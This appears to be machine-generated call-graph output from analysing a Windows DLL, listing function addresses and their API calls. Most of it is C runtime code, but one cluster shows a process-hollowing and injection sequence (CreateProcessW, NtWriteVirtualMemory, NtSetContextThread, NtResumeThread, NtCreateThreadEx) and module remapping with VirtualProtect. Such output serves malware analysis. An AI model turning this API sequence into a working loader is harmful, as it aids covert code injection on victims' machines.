11591 6cef3a47 11589->11591 11593 6cef56d0 _free 6 API calls 11590->11593 11594 6cef56d0 _free 6 API calls 11591->11594 11592 6cef3a94 11605 6cef4cb6 11592->11605 11595 6cef3a68 11593->11595 11598 6cef3a53 11594->11598 11596 6cef3a6c 11595->11596 11597 6cef3a7b 11595->11597 11599 6cef56d0 _free 6 API calls 11596->11599 11600 6cef3749 _free 14 API calls 11597->11600 11601 6cef3f43 _free 14 API calls 11598->11601 11599->11598 11602 6cef3a86 11600->11602 11601->11604 11603 6cef3f43 _free 14 API calls 11602->11603 11603->11604 11604->11592 11624 6cef3429 11604->11624 11719 6cef4dca 11605->11719 11635 6cef5c5c 11624->11635 11627 6cef3439 11629 6cef3462 11627->11629 11630 6cef3443 IsProcessorFeaturePresent 11627->11630 11671 6cef2b5b 11629->11671 11631 6cef344f 11630->11631 11665 6cef3c6a 11631->11665 11674 6cef5b8e 11635->11674 11638 6cef5ca1 11639 6cef5cad ___scrt_is_nonwritable_in_current_image 11638->11639 11640 6cef3a9e _free 14 API calls 11639->11640 11644 6cef5cda __fassign 11639->11644 11646 6cef5cd4 __fassign 11639->11646 11640->11646 11641 6cef5d21 11643 6cef3ed3 _free 14 API calls 11641->11643 11642 6cef5d0b 11642->11627 11645 6cef5d26 11643->11645 11648 6cef5d4d 11644->11648 11685 6cef3bda EnterCriticalSection 11644->11685 11647 6cef3e16 __fassign 25 API calls 11645->11647 11646->11641 11646->11642 11646->11644 11647->11642 11651 6cef5d8f 11648->11651 11652 6cef5e80 11648->11652 11663 6cef5dbe 11648->11663 11651->11663 11686 6cef3947 GetLastError 11651->11686 11654 6cef5e8b 11652->11654 11717 6cef3c22 LeaveCriticalSection 11652->11717 11655 6cef2b5b __fassign 23 API calls 11654->11655 11657 6cef5e93 11655->11657 11659 6cef3947 __fassign 37 API calls 11661 6cef5e13 11659->11661 11661->11642 11664 6cef3947 __fassign 37 API calls 11661->11664 11662 6cef3947 __fassign 37 API calls 11662->11663 11713 6cef5e2d 11663->11713 11664->11642 11666 6cef3c86 __DllMainCRTStartup@12 11665->11666 11667 6cef3cb2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11666->11667 11668 6cef3d83 __DllMainCRTStartup@12 11667->11668 11669 6cef0a90 _ValidateLocalCookies 5 API calls 11668->11669 11670 6cef3da1 11669->11670 11670->11629 11672 6cef2a01 __DllMainCRTStartup@12 23 API calls 11671->11672 11673 6cef2b6c 11672->11673 11675 6cef5b9a ___scrt_is_nonwritable_in_current_image 11674->11675 11680 6cef3bda EnterCriticalSection 11675->11680 11677 6cef5ba8 11681 6cef5be6 11677->11681 11680->11677 11684 6cef3c22 LeaveCriticalSection 11681->11684 11683 6cef342e 11683->11627 11683->11638 11684->11683 11685->11648 11687 6cef395e 11686->11687 11688 6cef3964 11686->11688 11690 6cef5691 _free 6 API calls 11687->11690 11689 6cef56d0 _free 6 API calls 11688->11689 11712 6cef396a SetLastError 11688->11712 11691 6cef3982 11689->11691 11690->11688 11692 6cef3ee6 _free 14 API calls 11691->11692 11691->11712 11694 6cef3992 11692->11694 11695 6cef399a 11694->11695 11696 6cef39b1 11694->11696 11699 6cef56d0 _free 6 API calls 11695->11699 11701 6cef56d0 _free 6 API calls 11696->11701 11697 6cef39fe 11700 6cef3429 __fassign 35 API calls 11697->11700 11698 6cef39f8 11698->11662 11703 6cef39a8 11699->11703 11704 6cef3a03 11700->11704 11702 6cef39bd 11701->11702 11705 6cef39d2 11702->11705 11706 6cef39c1 11702->11706 11709 6cef3f43 _free 14 API calls 11703->11709 11708 6cef3749 _free 14 API calls 11705->11708 11707 6cef56d0 _free 6 API calls 11706->11707 11707->11703 11710 6cef39dd 11708->11710 11709->11712 11711 6cef3f43 _free 14 API calls 11710->11711 11711->11712 11712->11697 11712->11698 11714 6cef5e04 11713->11714 11715 6cef5e33 11713->11715 11714->11642 11714->11659 11714->11661 11718 6cef3c22 LeaveCriticalSection 11715->11718 11717->11654 11718->11714 11720 6cef4dd6 ___scrt_is_nonwritable_in_current_image 11719->11720 11722 6cef4df0 11720->11722 11763 6cef3bda EnterCriticalSection 11720->11763 11724 6cef3429 __fassign 37 API calls 11722->11724 11725 6cef4cc9 11722->11725 11723 6cef4e2c 11764 6cef4e49 11723->11764 11727 6cef4e69 11724->11727 11730 6cef4a60 11725->11730 11728 6cef4e00 11728->11723 11729 6cef3f43 _free 14 API calls 11728->11729 11729->11723 11768 6cef346d 11730->11768 11763->11728 11767 6cef3c22 LeaveCriticalSection 11764->11767 11766 6cef4e50 11766->11722 11767->11766 11769 6cef348d 11768->11769 11770 6cef3947 __fassign 37 API calls 11769->11770 11771 6cef34ad 11770->11771 11775 6cef6466 11771->11775 11776 6cef6479 11775->11776 11778 6cef34c3 11775->11778 11776->11778 11783 6cef6874 11776->11783 11779 6cef6493 11778->11779 11780 6cef64bb 11779->11780 11781 6cef64a6 11779->11781 11781->11780 11805 6cef4eb2 11781->11805 11784 6cef6880 ___scrt_is_nonwritable_in_current_image 11783->11784 11785 6cef3947 __fassign 37 API calls 11784->11785 11786 6cef6889 11785->11786 11793 6cef68cf 11786->11793 11796 6cef3bda EnterCriticalSection 11786->11796 11788 6cef68a7 11797 6cef68f5 11788->11797 11793->11778 11794 6cef3429 __fassign 37 API calls 11795 6cef68f4 11794->11795 11796->11788 11798 6cef6903 __fassign 11797->11798 11800 6cef68b8 11797->11800 11799 6cef6628 __fassign 14 API calls 11798->11799 11798->11800 11799->11800 11801 6cef68d4 11800->11801 11804 6cef3c22 LeaveCriticalSection 11801->11804 11803 6cef68cb 11803->11793 11803->11794 11804->11803 11806 6cef3947 __fassign 37 API calls 11805->11806 11807 6cef4ebc 11806->11807 11808 6cef4dca __fassign 37 API calls 11807->11808 11809 6cef4ec2 11808->11809 11809->11780 11921 6cef33dc 11920->11921 11923 6cef33ea 11920->11923 11921->11923 11927 6cef3401 11921->11927 11922 6cef3ed3 _free 14 API calls 11924 6cef33f2 11922->11924 11923->11922 11925 6cef3e16 __fassign 25 API calls 11924->11925 11926 6cef33fc 11925->11926 11926->11574 11927->11926 11928 6cef3ed3 _free 14 API calls 11927->11928 11928->11924 11933 6cef2fac 11929->11933 11934 6cef2f78 11929->11934 11930 6cef2fc3 11932 6cef3f43 _free 14 API calls 11930->11932 11931 6cef3f43 _free 14 API calls 11931->11933 11932->11934 11933->11930 11933->11931 11934->11575 11936 6cef3e32 11935->11936 11937 6cef3c6a __fassign 8 API calls 11936->11937 11938 6cef3e47 GetCurrentProcess TerminateProcess 11937->11938 11938->11579 12425 6cef733a 12426 6cef4e6a 47 API calls 12425->12426 12427 6cef733f 12426->12427 12298 6cef2b78 12299 6cef2b8f 12298->12299 12300 6cef2b88 12298->12300 12301 6cef2bb0 12299->12301 12303 6cef2b9a 12299->12303 12302 6cef4e6a 47 API calls 12301->12302 12304 6cef2bb6 12302->12304 12305 6cef3ed3 _free 14 API calls 12303->12305 12322 6cef48b1 GetModuleFileNameW 12304->12322 12307 6cef2b9f 12305->12307 12308 6cef3e16 __fassign 25 API calls 12307->12308 12308->12300 12314 6cef2c14 12317 6cef3ed3 _free 14 API calls 12314->12317 12315 6cef2c20 12316 6cef2cae 37 API calls 12315->12316 12318 6cef2c38 12316->12318 12321 6cef2c19 12317->12321 12320 6cef3f43 _free 14 API calls 12318->12320 12318->12321 12319 6cef3f43 _free 14 API calls 12319->12300 12320->12321 12321->12319 12323 6cef48f1 12322->12323 12324 6cef48e0 GetLastError 12322->12324 12344 6cef462a 12323->12344 12326 6cef3e9d __dosmaperr 14 API calls 12324->12326 12328 6cef48ec 12326->12328 12330 6cef0a90 _ValidateLocalCookies 5 API calls 12328->12330 12331 6cef2bc9 12330->12331 12332 6cef2cae 12331->12332 12334 6cef2cd3 12332->12334 12336 6cef2d33 12334->12336 12380 6cef5190 12334->12380 12335 6cef2bfe 12338 6cef2e22 12335->12338 12336->12335 12337 6cef5190 37 API calls 12336->12337 12337->12336 12339 6cef2c0b 12338->12339 12340 6cef2e33 12338->12340 12339->12314 12339->12315 12340->12339 12341 6cef3ee6 _free 14 API calls 12340->12341 12342 6cef2e5c 12341->12342 12343 6cef3f43 _free 14 API calls 12342->12343 12343->12339 12345 6cef346d __fassign 37 API calls 12344->12345 12346 6cef463c 12345->12346 12348 6cef464e 12346->12348 12370 6cef55f4 12346->12370 12349 6cef47af 12348->12349 12350 6cef47bc 12349->12350 12351 6cef47cb 12349->12351 12350->12328 12352 6cef47f8 12351->12352 12353 6cef47d3 12351->12353 12354 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12352->12354 12353->12350 12376 6cef4876 12353->12376 12356 6cef4808 12354->12356 12357 6cef480f GetLastError 12356->12357 12358 6cef4825 12356->12358 12359 6cef3e9d __dosmaperr 14 API calls 12357->12359 12360 6cef4836 12358->12360 12361 6cef4876 14 API calls 12358->12361 12363 6cef481b 12359->12363 12360->12350 12362 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12360->12362 12361->12360 12364 6cef484e 12362->12364 12365 6cef3ed3 _free 14 API calls 12363->12365 12364->12350 12366 6cef4855 GetLastError 12364->12366 12365->12350 12367 6cef3e9d __dosmaperr 14 API calls 12366->12367 12368 6cef4861 12367->12368 12369 6cef3ed3 _free 14 API calls 12368->12369 12369->12350 12373 6cef541c 12370->12373 12374 6cef5531 _free 5 API calls 12373->12374 12375 6cef5432 12374->12375 12375->12348 12377 6cef4881 12376->12377 12378 6cef3ed3 _free 14 API calls 12377->12378 12379 6cef488a 12378->12379 12379->12350 12383 6cef5139 12380->12383 12384 6cef346d __fassign 37 API calls 12383->12384 12385 6cef514d 12384->12385 12385->12334 12219 6cef2ff7 12220 6cef3009 12219->12220 12221 6cef300f 12219->12221 12222 6cef2f9f 14 API calls 12220->12222 12222->12221 11939 6cef3274 11940 6cef3f43 _free 14 API calls 11939->11940 11941 6cef3282 11940->11941 11942 6cef3f43 _free 14 API calls 11941->11942 11943 6cef3295 11942->11943 11944 6cef3f43 _free 14 API calls 11943->11944 11945 6cef32a6 11944->11945 11946 6cef3f43 _free 14 API calls 11945->11946 11947 6cef32b7 11946->11947 12386 6cef0d73 ___scrt_dllmain_exception_filter 12428 6cef4133 12429 6cef4143 12428->12429 12438 6cef4157 12428->12438 12430 6cef3ed3 _free 14 API calls 12429->12430 12431 6cef4148 12430->12431 12434 6cef3e16 __fassign 25 API calls 12431->12434 12432 6cef41ce 12433 6cef2e22 14 API calls 12432->12433 12435 6cef4233 12433->12435 12445 6cef4152 12434->12445 12437 6cef423c 12435->12437 12443 6cef4317 12435->12443 12467 6cef6ef1 12435->12467 12439 6cef3f43 _free 14 API calls 12437->12439 12438->12432 12447 6cef4247 12438->12447 12449 6cef4322 12438->12449 12439->12447 12440 6cef4303 12442 6cef3f43 _free 14 API calls 12440->12442 12442->12445 12446 6cef3e26 __fassign 11 API calls 12443->12446 12444 6cef3f43 _free 14 API calls 12444->12447 12448 6cef4321 12446->12448 12447->12440 12447->12444 12450 6cef432e 12449->12450 12450->12450 12451 6cef3ee6 _free 14 API calls 12450->12451 12452 6cef435c 12451->12452 12453 6cef6ef1 25 API calls 12452->12453 12454 6cef4388 12453->12454 12455 6cef3e26 __fassign 11 API calls 12454->12455 12456 6cef43d2 12455->12456 12457 6cef462a 37 API calls 12456->12457 12458 6cef449a 12457->12458 12476 6cef4116 12458->12476 12461 6cef44e8 12462 6cef462a 37 API calls 12461->12462 12463 6cef4525 12462->12463 12479 6cef4047 12463->12479 12466 6cef4322 43 API calls 12468 6cef6e3e 12467->12468 12469 6cef6e56 12468->12469 12470 6cef6e6a 12468->12470 12474 6cef6e8e 12468->12474 12469->12470 12471 6cef3ed3 _free 14 API calls 12469->12471 12470->12435 12472 6cef6e60 12471->12472 12473 6cef3e16 __fassign 25 API calls 12472->12473 12473->12470 12474->12470 12475 6cef3ed3 _free 14 API calls 12474->12475 12475->12472 12502 6cef3f95 12476->12502 12480 6cef4055 12479->12480 12481 6cef4071 12479->12481 12484 6cef4669 14 API calls 12480->12484 12482 6cef4098 12481->12482 12483 6cef4078 12481->12483 12486 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12482->12486 12485 6cef405f 12483->12485 12532 6cef4683 12483->12532 12484->12485 12485->12466 12488 6cef40a8 12486->12488 12489 6cef40af GetLastError 12488->12489 12490 6cef40c5 12488->12490 12491 6cef3e9d __dosmaperr 14 API calls 12489->12491 12494 6cef4683 15 API calls 12490->12494 12495 6cef40d6 12490->12495 12493 6cef40bb 12491->12493 12492 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 12496 6cef40ee 12492->12496 12497 6cef3ed3 _free 14 API calls 12493->12497 12494->12495 12495->12485 12495->12492 12496->12485 12498 6cef40f5 GetLastError 12496->12498 12497->12485 12499 6cef3e9d __dosmaperr 14 API calls 12498->12499 12500 6cef4101 12499->12500 12501 6cef3ed3 _free 14 API calls 12500->12501 12501->12485 12503 6cef3fbd 12502->12503 12504 6cef3fa3 12502->12504 12506 6cef3fc4 12503->12506 12507 6cef3fe3 12503->12507 12520 6cef4669 12504->12520 12512 6cef3fad FindFirstFileExW 12506->12512 12524 6cef46bf 12506->12524 12508 6cef51c1 __fassign MultiByteToWideChar 12507->12508 12509 6cef3ff2 12508->12509 12511 6cef3ff9 GetLastError 12509->12511 12514 6cef401f 12509->12514 12516 6cef46bf 15 API calls 12509->12516 12513 6cef3e9d __dosmaperr 14 API calls 12511->12513 12512->12461 12515 6cef4005 12513->12515 12514->12512 12517 6cef51c1 __fassign MultiByteToWideChar 12514->12517 12518 6cef3ed3 _free 14 API calls 12515->12518 12516->12514 12519 6cef4036 12517->12519 12518->12512 12519->12511 12519->12512 12521 6cef4674 12520->12521 12522 6cef467c 12520->12522 12523 6cef3f43 _free 14 API calls 12521->12523 12522->12512 12523->12522 12525 6cef4669 14 API calls 12524->12525 12526 6cef46cd 12525->12526 12529 6cef46fe 12526->12529 12530 6cef62bc 15 API calls 12529->12530 12531 6cef46de 12530->12531 12531->12512 12533 6cef4669 14 API calls 12532->12533 12534 6cef4691 12533->12534 12535 6cef46fe 15 API calls 12534->12535 12536 6cef469f 12535->12536 12536->12485 12129 6cef5a31 12130 6cef5a36 12129->12130 12132 6cef5a59 12130->12132 12133 6cef74dc 12130->12133 12134 6cef750b 12133->12134 12135 6cef74e9 12133->12135 12134->12130 12136 6cef74f7 DeleteCriticalSection 12135->12136 12137 6cef7505 12135->12137 12136->12136 12136->12137 12138 6cef3f43 _free 14 API calls 12137->12138 12138->12134 12139 6cef8c0f 12140 6cef8c18 12139->12140 12141 6cef8cbe 12140->12141 12145 6cef8c3f 12140->12145 12142 6cef99a7 20 API calls 12141->12142 12144 6cef8cce 12142->12144 12143 6cef98d0 12145->12143 12146 6cef99a7 20 API calls 12145->12146 12147 6cef98ce 12146->12147 11948 6cef584c GetProcessHeap 12537 6cef6d09 12540 6cef699e 12537->12540 12538 6cef0a90 _ValidateLocalCookies 5 API calls 12539 6cef69ab 12538->12539 12540->12538 12540->12540 11949 6cef6248 11950 6cef6177 ___scrt_uninitialize_crt 66 API calls 11949->11950 11951 6cef6250 11950->11951 11959 6cef8256 11951->11959 11953 6cef6255 11969 6cef8301 11953->11969 11956 6cef627f 11957 6cef3f43 _free 14 API calls 11956->11957 11958 6cef628a 11957->11958 11960 6cef8262 ___scrt_is_nonwritable_in_current_image 11959->11960 11973 6cef3bda EnterCriticalSection 11960->11973 11962 6cef82d9 11987 6cef82f8 11962->11987 11964 6cef826d 11964->11962 11966 6cef82ad DeleteCriticalSection 11964->11966 11974 6cef898b 11964->11974 11968 6cef3f43 _free 14 API calls 11966->11968 11968->11964 11970 6cef6264 DeleteCriticalSection 11969->11970 11971 6cef8318 11969->11971 11970->11953 11970->11956 11971->11970 11972 6cef3f43 _free 14 API calls 11971->11972 11972->11970 11973->11964 11975 6cef8997 ___scrt_is_nonwritable_in_current_image 11974->11975 11976 6cef89b6 11975->11976 11977 6cef89a1 11975->11977 11983 6cef89b1 11976->11983 11990 6cef6294 EnterCriticalSection 11976->11990 11978 6cef3ed3 _free 14 API calls 11977->11978 11979 6cef89a6 11978->11979 11981 6cef3e16 __fassign 25 API calls 11979->11981 11981->11983 11982 6cef89d3 11991 6cef8914 11982->11991 11983->11964 11985 6cef89de 12007 6cef8a05 11985->12007 12087 6cef3c22 LeaveCriticalSection 11987->12087 11989 6cef82e5 11989->11953 11990->11982 11992 6cef8936 11991->11992 11993 6cef8921 11991->11993 11996 6cef60ca ___scrt_uninitialize_crt 62 API calls 11992->11996 12005 6cef8931 11992->12005 11994 6cef3ed3 _free 14 API calls 11993->11994 11995 6cef8926 11994->11995 11997 6cef3e16 __fassign 25 API calls 11995->11997 11998 6cef894b 11996->11998 11997->12005 11999 6cef8301 14 API calls 11998->11999 12000 6cef8953 11999->12000 12001 6cef64c0 ___scrt_uninitialize_crt 25 API calls 12000->12001 12002 6cef8959 12001->12002 12010 6cef8f87 12002->12010 12005->11985 12006 6cef3f43 _free 14 API calls 12006->12005 12086 6cef62a8 LeaveCriticalSection 12007->12086 12009 6cef8a0d 12009->11983 12011 6cef8fad 12010->12011 12012 6cef8f98 12010->12012 12014 6cef8ff6 12011->12014 12019 6cef8fd4 12011->12019 12025 6cef3ec0 12012->12025 12015 6cef3ec0 __dosmaperr 14 API calls 12014->12015 12017 6cef8ffb 12015->12017 12021 6cef3ed3 _free 14 API calls 12017->12021 12018 6cef3ed3 _free 14 API calls 12022 6cef895f 12018->12022 12028 6cef8efb 12019->12028 12023 6cef9003 12021->12023 12022->12005 12022->12006 12024 6cef3e16 __fassign 25 API calls 12023->12024 12024->12022 12026 6cef3a9e _free 14 API calls 12025->12026 12027 6cef3ec5 12026->12027 12027->12018 12029 6cef8f07 ___scrt_is_nonwritable_in_current_image 12028->12029 12039 6cef75af EnterCriticalSection 12029->12039 12031 6cef8f15 12032 6cef8f3c 12031->12032 12033 6cef8f47 12031->12033 12040 6cef9014 12032->12040 12035 6cef3ed3 _free 14 API calls 12033->12035 12036 6cef8f42 12035->12036 12055 6cef8f7b 12036->12055 12039->12031 12058 6cef7686 12040->12058 12042 6cef902a 12071 6cef75f5 12042->12071 12044 6cef9024 12044->12042 12045 6cef905c 12044->12045 12048 6cef7686 ___scrt_uninitialize_crt 25 API calls 12044->12048 12045->12042 12046 6cef7686 ___scrt_uninitialize_crt 25 API calls 12045->12046 12050 6cef9068 CloseHandle 12046->12050 12049 6cef9053 12048->12049 12052 6cef7686 ___scrt_uninitialize_crt 25 API calls 12049->12052 12050->12042 12053 6cef9074 GetLastError 12050->12053 12051 6cef90a4 12051->12036 12052->12045 12053->12042 12085 6cef75d2 LeaveCriticalSection 12055->12085 12057 6cef8f64 12057->12022 12059 6cef76a8 12058->12059 12060 6cef7693 12058->12060 12063 6cef3ec0 __dosmaperr 14 API calls 12059->12063 12065 6cef76cd 12059->12065 12061 6cef3ec0 __dosmaperr 14 API calls 12060->12061 12062 6cef7698 12061->12062 12064 6cef3ed3 _free 14 API calls 12062->12064 12066 6cef76d8 12063->12066 12067 6cef76a0 12064->12067 12065->12044 12068 6cef3ed3 _free 14 API calls 12066->12068 12067->12044 12069 6cef76e0 12068->12069 12070 6cef3e16 __fassign 25 API calls 12069->12070 12070->12067 12072 6cef766b 12071->12072 12073 6cef7604 12071->12073 12074 6cef3ed3 _free 14 API calls 12072->12074 12073->12072 12079 6cef762e 12073->12079 12075 6cef7670 12074->12075 12076 6cef3ec0 __dosmaperr 14 API calls 12075->12076 12077 6cef765b 12076->12077 12077->12051 12080 6cef3e9d 12077->12080 12078 6cef7655 SetStdHandle 12078->12077 12079->12077 12079->12078 12081 6cef3ec0 __dosmaperr 14 API calls 12080->12081 12082 6cef3ea8 _free 12081->12082 12083 6cef3ed3 _free 14 API calls 12082->12083 12084 6cef3ebb 12083->12084 12084->12051 12085->12057 12086->12009 12087->11989 11361 6cee8640 11385 6cee8660 __DllMainCRTStartup@12 11361->11385 11362 6cee7d90 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11362->11385 11363 6ceeb675 NtGetContextThread 11363->11385 11364 6ceedcf4 NtWriteVirtualMemory 11364->11385 11365 6ceeb946 NtAllocateVirtualMemory 11365->11385 11366 6ceef790 NtReadVirtualMemory 11366->11385 11367 6ceefc4b CreateProcessW 11367->11385 11368 6ceeb7f2 NtAllocateVirtualMemory 11368->11385 11369 6cee6b80 7 API calls 11369->11385 11370 6cef0114 NtReadVirtualMemory 11370->11385 11371 6ceead15 VirtualAlloc 11371->11385 11372 6ceef96d NtWriteVirtualMemory 11372->11385 11373 6ceee5d6 NtCreateThreadEx 11373->11385 11374 6ceee095 NtWriteVirtualMemory 11374->11385 11375 6ceef2c8 NtWriteVirtualMemory 11375->11385 11376 6ceef9ee NtSetContextThread NtResumeThread 11376->11385 11377 6ceeec2d CloseHandle CloseHandle 11377->11385 11378 6ceeb996 NtWriteVirtualMemory 11378->11385 11379 6ceee967 NtSetContextThread NtResumeThread 11379->11385 11380 6ceeb398 CreateProcessW 11380->11385 11381 6cee1000 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11381->11385 11382 6ceebd0a NtWriteVirtualMemory 11382->11385 11383 6ceea4d5 GetConsoleWindow ShowWindow 11394 6cee1740 11383->11394 11385->11362 11385->11363 11385->11364 11385->11365 11385->11366 11385->11367 11385->11368 11385->11369 11385->11370 11385->11371 11385->11372 11385->11373 11385->11374 11385->11375 11385->11376 11385->11377 11385->11378 11385->11379 11385->11380 11385->11381 11385->11382 11385->11383 11386 6cee1740 27 API calls 11385->11386 11387 6ceeee5a 11385->11387 11390 6ceed9e4 NtReadVirtualMemory 11385->11390 11391 6ceef142 NtAllocateVirtualMemory 11385->11391 11392 6ceec376 NtWriteVirtualMemory 11385->11392 11393 6ceeffc9 CloseHandle CloseHandle 11385->11393 11386->11385 11388 6cef0a90 _ValidateLocalCookies 5 API calls 11387->11388 11389 6ceeee64 11388->11389 11390->11385 11391->11385 11392->11385 11393->11385 11398 6cee17a7 ___scrt_uninitialize_crt 11394->11398 11395 6cee2a7b GetModuleFileNameA 11395->11398 11396 6cee2e64 CloseHandle 11396->11398 11397 6cee4139 GetModuleFileNameA 11397->11398 11398->11395 11398->11396 11398->11397 11399 6cee3963 CloseHandle 11398->11399 11400 6cee398c CloseHandle CloseHandle 11398->11400 11401 6cee3d72 GetModuleFileNameA 11398->11401 11402 6cee40aa GetCurrentProcess 11398->11402 11405 6cee2476 GetCurrentProcess 11398->11405 11408 6cee34ec VirtualProtect 11398->11408 11409 6cee3f1d MapViewOfFile 11398->11409 11410 6cee4171 CreateFileMappingA 11398->11410 11411 6cee2f07 MapViewOfFile 11398->11411 11412 6cee432b GetModuleFileNameA 11398->11412 11413 6cee33e3 VirtualProtect 11398->11413 11414 6cee3bde 11398->11414 11417 6cee288f K32GetModuleInformation 11398->11417 11418 6cee2c8f CreateFileMappingA 11398->11418 11419 6cee2b6d CreateFileA 11398->11419 11420 6cee41fb VirtualProtect 11398->11420 11422 6cee4375 MapViewOfFile 11398->11422 11399->11398 11400->11398 11401->11398 11403 6cef16c0 __DllMainCRTStartup@12 11402->11403 11404 6cee40eb GetModuleHandleA 11403->11404 11404->11398 11423 6cef16c0 11405->11423 11408->11398 11409->11398 11410->11398 11411->11398 11412->11398 11413->11398 11415 6cef0a90 _ValidateLocalCookies 5 API calls 11414->11415 11416 6cee3be8 11415->11416 11416->11385 11417->11398 11418->11398 11419->11398 11421 6cee42b8 ___scrt_uninitialize_crt 11420->11421 11421->11398 11422->11398 11424 6cee24bd GetModuleHandleA 11423->11424 11424->11398 12223 6cef8bc1 12224 6cef8be1 12223->12224 12227 6cef8c18 12224->12227 12226 6cef8c0b 12228 6cef8c1f 12227->12228 12229 6cef8cbe 12228->12229 12233 6cef8c3f 12228->12233 12230 6cef99a7 20 API calls 12229->12230 12232 6cef8cce 12230->12232 12231 6cef98d0 12231->12226 12232->12226 12233->12226 12233->12231 12234 6cef99a7 20 API calls 12233->12234 12235 6cef98ce 12234->12235 12235->12226 11425 6cef6180 11426 6cef618d 11425->11426 11427 6cef3ee6 _free 14 API calls 11426->11427 11428 6cef61a7 11427->11428 11429 6cef3f43 _free 14 API calls 11428->11429 11430 6cef61b3 11429->11430 11431 6cef61d9 11430->11431 11432 6cef3ee6 _free 14 API calls 11430->11432 11436 6cef61e5 11431->11436 11437 6cef6243 11431->11437 11438 6cef5712 11431->11438 11433 6cef61cd 11432->11433 11435 6cef3f43 _free 14 API calls 11433->11435 11435->11431 11439 6cef5531 _free 5 API calls 11438->11439 11440 6cef572e 11439->11440 11441 6cef574c InitializeCriticalSectionAndSpinCount 11440->11441 11442 6cef5737 11440->11442 11441->11442 11442->11431 12387 6cef6f40 12390 6cef6f57 12387->12390 12389 6cef6f52 12391 6cef6f79 12390->12391 12392 6cef6f65 12390->12392 12394 6cef6f93 12391->12394 12395 6cef6f81 12391->12395 12393 6cef3ed3 _free 14 API calls 12392->12393 12396 6cef6f6a 12393->12396 12398 6cef346d __fassign 37 API calls 12394->12398 12401 6cef6f91 12394->12401 12397 6cef3ed3 _free 14 API calls 12395->12397 12399 6cef3e16 __fassign 25 API calls 12396->12399 12400 6cef6f86 12397->12400 12398->12401 12402 6cef6f75 12399->12402 12403 6cef3e16 __fassign 25 API calls 12400->12403 12401->12389 12402->12389 12403->12401 12541 6cef9100 12544 6cef911e 12541->12544 12543 6cef9116 12545 6cef9123 12544->12545 12546 6cef91b8 12545->12546 12547 6cef99e3 15 API calls 12545->12547 12546->12543 12548 6cef934f 12547->12548 12548->12543 10595 6cef0a9e 10596 6cef0adc 10595->10596 10597 6cef0aa9 10595->10597 10634 6cef0bf8 10596->10634 10599 6cef0ace 10597->10599 10600 6cef0aae 10597->10600 10607 6cef0af1 10599->10607 10601 6cef0ac4 10600->10601 10602 6cef0ab3 10600->10602 10626 6cef10ab 10601->10626 10606 6cef0ab8 10602->10606 10621 6cef10ca 10602->10621 10608 6cef0afd ___scrt_is_nonwritable_in_current_image 10607->10608 10661 6cef113b 10608->10661 10610 6cef0b04 __DllMainCRTStartup@12 10611 6cef0b2b 10610->10611 10612 6cef0bf0 10610->10612 10618 6cef0b67 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10610->10618 10672 6cef109d 10611->10672 10680 6cef12da IsProcessorFeaturePresent 10612->10680 10615 6cef0bf7 10616 6cef0b3a __RTC_Initialize 10616->10618 10675 6cef0fbb InitializeSListHead 10616->10675 10618->10606 10619 6cef0b48 10619->10618 10676 6cef1072 10619->10676 10774 6cef332e 10621->10774 11078 6cef1f80 10626->11078 10631 6cef10c7 10631->10606 10632 6cef1f8b 21 API calls 10633 6cef10b4 10632->10633 10633->10606 10635 6cef0c04 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10634->10635 10636 6cef0c35 10635->10636 10637 6cef0ca0 10635->10637 10653 6cef0c0d 10635->10653 11098 6cef110b 10636->11098 10638 6cef12da __DllMainCRTStartup@12 4 API calls 10637->10638 10642 6cef0ca7 ___scrt_is_nonwritable_in_current_image 10638->10642 10640 6cef0c3a 11107 6cef0fc7 10640->11107 10643 6cef0cc3 10642->10643 10644 6cef0cdd dllmain_raw 10642->10644 10646 6cef0cd8 10642->10646 10643->10606 10644->10643 10647 6cef0cf7 dllmain_crt_dispatch 10644->10647 10645 6cef0c3f __RTC_Initialize __DllMainCRTStartup@12 11110 6cef12ac 10645->11110 11119 6cef0250 10646->11119 10647->10643 10647->10646 10653->10606 10654 6cef0d49 10654->10643 10655 6cef0d52 dllmain_crt_dispatch 10654->10655 10655->10643 10657 6cef0d65 dllmain_raw 10655->10657 10656 6cef0250 __DllMainCRTStartup@12 5 API calls 10658 6cef0d30 10656->10658 10657->10643 10659 6cef0bf8 __DllMainCRTStartup@12 79 API calls 10658->10659 10660 6cef0d3e dllmain_raw 10659->10660 10660->10654 10662 6cef1144 10661->10662 10684 6cef14a8 IsProcessorFeaturePresent 10662->10684 10666 6cef1155 10667 6cef1159 10666->10667 10694 6cef3311 10666->10694 10667->10610 10670 6cef1170 10670->10610 10768 6cef1174 10672->10768 10674 6cef10a4 10674->10616 10675->10619 10677 6cef1077 ___scrt_release_startup_lock 10676->10677 10678 6cef14a8 IsProcessorFeaturePresent 10677->10678 10679 6cef1080 10677->10679 10678->10679 10679->10618 10681 6cef12f0 __DllMainCRTStartup@12 10680->10681 10682 6cef139b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10681->10682 10683 6cef13e6 __DllMainCRTStartup@12 10682->10683 10683->10615 10685 6cef1150 10684->10685 10686 6cef1f61 10685->10686 10703 6cef2397 10686->10703 10690 6cef1f72 10691 6cef1f7d 10690->10691 10717 6cef23d3 10690->10717 10691->10666 10693 6cef1f6a 10693->10666 10759 6cef5a5d 10694->10759 10697 6cef1f96 10698 6cef1f9f 10697->10698 10699 6cef1fa9 10697->10699 10700 6cef237c ___vcrt_uninitialize_ptd 6 API calls 10698->10700 10699->10667 10701 6cef1fa4 10700->10701 10702 6cef23d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10701->10702 10702->10699 10704 6cef23a0 10703->10704 10706 6cef23c9 10704->10706 10707 6cef1f66 10704->10707 10721 6cef2605 10704->10721 10708 6cef23d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10706->10708 10707->10693 10709 6cef2349 10707->10709 10708->10707 10740 6cef2516 10709->10740 10712 6cef235e 10712->10690 10715 6cef2379 10715->10690 10718 6cef23fd 10717->10718 10719 6cef23de 10717->10719 10718->10693 10720 6cef23e8 DeleteCriticalSection 